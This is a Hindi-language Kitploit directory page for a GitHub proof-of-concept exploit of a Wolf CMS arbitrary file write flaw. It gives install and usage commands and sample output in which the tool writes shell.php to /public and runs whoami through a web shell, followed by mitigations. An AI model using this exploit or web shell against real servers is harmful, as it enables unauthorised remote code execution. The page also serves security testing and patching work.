Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-67206 — Wolf CMS <= 0.8.3.1 के लिए PoC एक्सप्लॉइट: एडमिन में प्रमाणीकरण करता है, FileManagerController के माध्यम से /public में एक मनमाना PHP फ़ाइल लिखता है, और वेब शेल के माध्यम से कमांड निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/anirbala98/cve-2026-67206
शोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

Wolf CMS <= 0.8.3.1 के लिए PoC एक्सप्लॉइट: एडमिन में प्रमाणीकरण करता है, FileManagerController के माध्यम से /public में एक मनमाना PHP फ़ाइल लिखता है, और वेब शेल के माध्यम से कमांड निष्पादित करता है।

रिपॉजिटरी देखें
191 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - मनमानी फ़ाइल लेखन के माध्यम से RCE

इस रिपॉजिटरी में CVE-2026-67206 के लिए एक Proof of Concept (PoC) एक्सप्लॉइट शामिल है

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। इसे उन सिस्टमों के विरुद्ध उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की अनुमति आपके पास नहीं है।

अवलोकन

Wolf CMS के 0.8.3.1 तक के संस्करणों में एक मनमानी फ़ाइल लेखन भेद्यता मौजूद है। यह एक प्रमाणित हमलावर को FileManagerController.php के create_file() और save() फ़ंक्शन के माध्यम से वेब रूट के /public निर्देशिका में दुर्भावनापूर्ण मनमानी फ़ाइलें लिखने की अनुमति देता है। FileManagerController.php का create_file() फ़ंक्शन फ़ाइल एक्सटेंशन को मान्य नहीं करता है, जिससे प्रमाणित हमलावर दुर्भावनापूर्ण PHP स्क्रिप्ट लिख सकते हैं और रिमोट कोड निष्पादन विशेषाधिकार प्राप्त कर सकते हैं।

स्रोत कोड विश्लेषण और एक्सप्लॉइट प्रदर्शन के साथ एक विस्तृत लेख मेरे Medium ब्लॉग पर पाया जा सकता है।

प्रभावित संस्करण

Wolf CMS के 0.8.3.1 तक के सभी संस्करण प्रभावित हैं। Wolf CMS रिपॉजिटरी को 28 अगस्त, 2021 को संग्रहीत (archived) कर दिया गया है और अब इसे सक्रिय रूप से अनुरक्षित नहीं किया जाता है। इस भेद्यता के लिए वर्तमान में कोई पैच मौजूद नहीं है।

आवश्यकताएँ

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

स्थापना

git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

उपयोग

python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

उदाहरण

└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Logging in with provided credentials...
[+] Login successful

[*] Creating a file named shell.php...
[+] File creation successful

[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

शमन (Mitigation)

  • प्रमाणित उपयोगकर्ताओं द्वारा बनाई गई फ़ाइलों के एक्सटेंशन को अनुमत सूची (allowlist) के आधार पर मान्य करें
  • .php, .phtml, .phar, .php5 आदि जैसे एक्सटेंशन को तब तक अस्वीकार करें जब तक कि अन्यथा आवश्यक न हो
  • वेब सर्वर रूट की अपलोड निर्देशिकाओं में PHP निष्पादन को अस्वीकार करें
  • प्रभाव को कम करने के लिए यदि संभव हो तो बनाई गई फ़ाइलों को किसी भिन्न सर्वर पर सहेजें

संदर्भ

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
टूल डाउनलोड करें